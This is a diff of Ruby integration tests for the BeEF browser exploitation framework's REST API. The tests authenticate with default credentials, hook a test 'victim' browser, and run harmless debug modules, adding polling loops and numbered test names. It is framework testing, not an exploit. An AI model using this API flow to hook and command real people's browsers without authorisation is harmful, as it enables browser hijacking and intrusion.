# Test RESTful API authentication with default credentials, returns the API token to be used later.
def test_restful_auth
def test_1_restful_auth
response = RestClient.post "#{RESTAPI_ADMIN}/login",
{ 'username' => "#{BEEF_USER}",
'password' => "#{BEEF_PASSWD}"}.to_json,
@@ -34,9 +39,9 @@ class TC_DebugModules < Test::Unit::TestCase
end
# Test RESTful API hooks handler hooking a victim browser, and then retrieving his BeEF session
def test_restful_hooks
def test_2_restful_hooks
BeefTest.new_victim
sleep 2.0
sleep 5.0
response = RestClient.get "#{RESTAPI_HOOKS}", {:params => {:token => @@token}}
assert_equal 200, response.code
assert_not_nil response.body
@@ -46,7 +51,7 @@ class TC_DebugModules < Test::Unit::TestCase
end
# Test RESTful API modules handler, retrieving the IDs of the 3 debug modules currently in the framework
def test_restful_modules
def test_3_restful_modules
response = RestClient.get "#{RESTAPI_MODULES}", {:params => {:token => @@token}}
assert_equal 200, response.code
assert_not_nil response.body
@@ -65,8 +70,8 @@ class TC_DebugModules < Test::Unit::TestCase
assert_not_nil @@mod_debug_ascii_chars
assert_not_nil @@mod_debug_test_network
end
# Test debug module "Test_return_long_string" using the RESTful API
#
## Test debug module "Test_return_long_string" using the RESTful API
def test_return_long_string
repeat_string = "BeEF"
repeat_count = 20
@@ -83,17 +88,25 @@ class TC_DebugModules < Test::Unit::TestCase
assert success
cmd_id = result['command_id']
sleep 3.0
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}", {:params => {:token => @@token}}
count = 0
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}?token=#{@@token}"
#TODO if the response is empty, the body size is 2, basically an empty Hash.
# don't know why empty?, nil and other checks are not working.
while(response.body.size <= 2 && count < 10)
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_long_string}/#{cmd_id}?token=#{@@token}"
sleep 2
count += 1
end
assert_equal 200, response.code
assert_not_nil response.body
result = JSON.parse(response.body)
data = JSON.parse(result["data"])
data = JSON.parse(result['0']['data'])['data']
assert_not_nil data
assert_equal data["data"],(repeat_string * repeat_count)
assert_equal data,(repeat_string * repeat_count)
end
# Test debug module "Test_return_ascii_chars" using the RESTful API
#
## Test debug module "Test_return_ascii_chars" using the RESTful API
def test_return_ascii_chars
response = RestClient.post "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}?token=#{@@token}",
{}.to_json, # module does not expect any input
@@ -104,18 +117,25 @@ class TC_DebugModules < Test::Unit::TestCase
result = JSON.parse(response.body)
success = result['success']
assert success
cmd_id = result['command_id']
sleep 3.0
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}", {:params => {:token => @@token}}
count = 0
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}?token=#{@@token}"
#TODO if the response is empty, the body size is 2, basically an empty Hash.
# don't know why empty?, nil and other checks are not working.
while(response.body.size <= 2 && count < 10)
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_ascii_chars}/#{cmd_id}?token=#{@@token}"
sleep 2
count += 1
end
assert_equal 200, response.code
assert_not_nil response.body
result = JSON.parse(response.body)
data = JSON.parse(result["data"])
data = JSON.parse(result['0']['data'])['data']
assert_not_nil data
ascii_chars = ""
(32..127).each do |i| ascii_chars << i.chr end
assert_equal ascii_chars,data["data"]
assert_equal ascii_chars,data
end
# Test debug module "Test_network_request" using the RESTful API
@@ -134,16 +154,23 @@ class TC_DebugModules < Test::Unit::TestCase
assert success
cmd_id = result['command_id']
sleep 3.0
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}", {:params => {:token => @@token}}
count = 0
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}?token=#{@@token}"
#TODO if the response is empty, the body size is 2, basically an empty Hash.
# don't know why empty?, nil and other checks are not working.
while(response.body.size <= 2 && count < 10)
response = RestClient.get "#{RESTAPI_MODULES}/#{@@hb_session}/#{@@mod_debug_test_network}/#{cmd_id}?token=#{@@token}"
sleep 2
count += 1
end
assert_equal 200, response.code
assert_not_nil response.body
result = JSON.parse(response.body)
data = JSON.parse(result["data"])
res = JSON.parse(data["data"])
assert_not_nil res
assert_equal 200, res["status_code"]
assert res["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
data = JSON.parse(result['0']['data'])['data']
assert_not_nil data
assert_equal 200, JSON.parse(data)["status_code"]
assert JSON.parse(data)["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
end
end

Some files were not shown because too many files have changed in this diff Show More